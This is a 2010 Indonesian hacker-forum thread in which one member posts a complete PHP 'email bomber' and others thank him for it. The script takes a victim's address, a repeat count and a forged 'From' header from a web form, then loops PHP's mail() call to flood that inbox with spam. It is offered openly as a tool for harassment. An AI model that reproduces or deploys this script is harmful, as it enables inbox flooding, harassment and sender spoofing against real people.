U3Dcrew
Would you like to react to this message? Create an account in a few clicks or log in to continue.

PHP email bomber

2 posters

Go down

PHP email bomber Empty PHP email bomber

Post by edelweize Sun Apr 11, 2010 10:16 pm

noohh scriptnya......

Code:
<?php 

    $num = 1;
    $email = $_POST['email'];
    $spam = $_POST['spam'];
    $subject = $_POST['subject'];
    $message = $_POST['message'];
    $from = $_POST['from'];
    $send = $_POST['send'];
   
    if($spam!='' && $email=='')
    {
        die('Please enter an email');
    }
   
    if(51<=$spam)
    {
        die('Error: Number to spam to large. Max is 50 (for security reasons)');
    }
   
    if($email != '')
    {
        while($num<=$spam)
        {
            mail ($email, $subject, $message, "From: " . $from);
            echo $num . "<br>";
            $num++;
        } 
    }
?>

<html>
<body>

    <form action="email.php" method="post"><br>
        Email: <input type="text" name="email" /><br>
        How many times to spam: <input type="text" name="spam" /><br>
        Subject: <input type="text" name="subject" /><br>
        Message: <TEXTAREA NAME="message" ROWS=6 COLS=40></TEXTAREA><br>
        From: <input type="text" name="from" /><br>
        <input type="submit" value="send" /><input type="reset" />
    </form>
</body>
</html>

nii ada contoh...
PHP Email Bomber

moga berguna all.... Very Happy

bye~


Regards,

Edelweize
edelweize
edelweize
V.I.P Member
V.I.P Member

Posts : 5
Reputation : 0
Join date : 2010-03-21
Age : 30

http://t0k3kmiringcrew.isgreat.org/

Back to top Go down

PHP email bomber Empty Re: PHP email bomber

Post by r3m1ck Sun Apr 11, 2010 11:50 pm

mantap kk ni dia yg saia cari hheee... ^ ^,, thx for share om,, keep share y om.... :apn:
r3m1ck
r3m1ck
Founder u3d
Founder u3d

Posts : 111
Reputation : -1
Join date : 2010-03-06
Location : r00t

http://r3m1ck.uni.cc/

Back to top Go down

PHP email bomber Empty Re: PHP email bomber

Post by edelweize Mon Apr 12, 2010 4:21 am

r3m1ck wrote:mantap kk ni dia yg saia cari hheee... ^ ^,, thx for share om,, keep share y om.... :apn:


wedew... Very Happy

iya Master r3m1ck... Very Happy

moga2 berguna yaaa... Smile


Regards,

Edelweize
edelweize
edelweize
V.I.P Member
V.I.P Member

Posts : 5
Reputation : 0
Join date : 2010-03-21
Age : 30

http://t0k3kmiringcrew.isgreat.org/

Back to top Go down

PHP email bomber Empty Re: PHP email bomber

Post by r3m1ck Mon Apr 12, 2010 5:17 pm

wadew... kok master,,, saia mah cupu om,,,, hhaaa... ^ ^.... :kabur:
r3m1ck
r3m1ck
Founder u3d
Founder u3d

Posts : 111
Reputation : -1
Join date : 2010-03-06
Location : r00t

http://r3m1ck.uni.cc/

Back to top Go down

PHP email bomber Empty Re: PHP email bomber

Post by r3m1ck Mon Apr 26, 2010 5:04 pm

ehhmm kayaknya ada yg kurang deh omz tu ,, butuh mail.php kalo g salah
r3m1ck
r3m1ck
Founder u3d
Founder u3d

Posts : 111
Reputation : -1
Join date : 2010-03-06
Location : r00t

http://r3m1ck.uni.cc/

Back to top Go down

PHP email bomber Empty Re: PHP email bomber

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum